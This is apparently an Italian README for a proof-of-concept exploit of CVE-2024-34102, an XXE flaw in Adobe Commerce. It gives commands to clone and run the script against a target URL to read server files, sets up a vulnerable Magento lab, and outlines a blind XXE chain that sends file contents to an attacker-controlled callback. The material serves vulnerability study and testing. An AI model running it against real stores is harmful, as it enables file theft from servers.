
Exploit XXE di Adobe Commerce
★ Grazie a @th3gokul, Sanjaith3hacker, Chocapikk per il codice originale. ★
CVE-2024-34102 : vulnerabilità XXE in Adobe Commerce descrizione: Le versioni di Adobe Commerce 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 e precedenti sono affette da una vulnerabilità di Improper Restriction of XML External Entity Reference ('XXE') che potrebbe portare all'esecuzione arbitraria di codice. Un attaccante potrebbe sfruttare questa vulnerabilità inviando un documento XML manipolato che fa riferimento a entità esterne. Lo sfruttamento di questo problema non richiede interazione da parte dell'utente.
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_DA_SFRUTTARE> -f <FILE_DA_LEGGERE>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Grazie alla configurazione Docker di markshust per Magento, non è difficile creare un ambiente di sviluppo vulnerabile. https://github.com/markshust/docker-magento
# Crea la directory del tuo progetto e entraci:
mkdir /opt/magento
cd $_
# Installa alcuni pacchetti (necessari per lo script)
sudo apt update
sudo apt install -y bc curl
# Crea la directory di Composer (per evitare uno strano errore)
mkdir /var/www/.composer/
# Esegui questo comando automatico one-liner dalla directory in cui vuoi installare il progetto.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Fornisci le credenziali quando richiesto.
# Modifica il file hosts
echo "127.0.0.1 magento.test" >> /etc/hosts

Puoi eseguire il debug del tuo Magento usando PHPSTORM.
bin/xdebug enable

...E poi puoi eseguire il debug del tuo Magento.
Crea un URL di callback (mocky api) -> Attacco Blind XXE (CVE-2024-34102) -> Invia il contenuto del file all'istanza dell'attaccante (SSRFUtility) -> Leggi l'istanza dell'attaccante (SSRFUtility)
Questo repository non è pensato per essere un exploit XXE per CVE-2024-34102. Lo scopo di questo progetto è aiutare le persone a conoscere questa vulnerabilità e, eventualmente, testare le proprie applicazioni.
Pubbliciamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni. https://www.skshieldus.com/eng/business/insight.do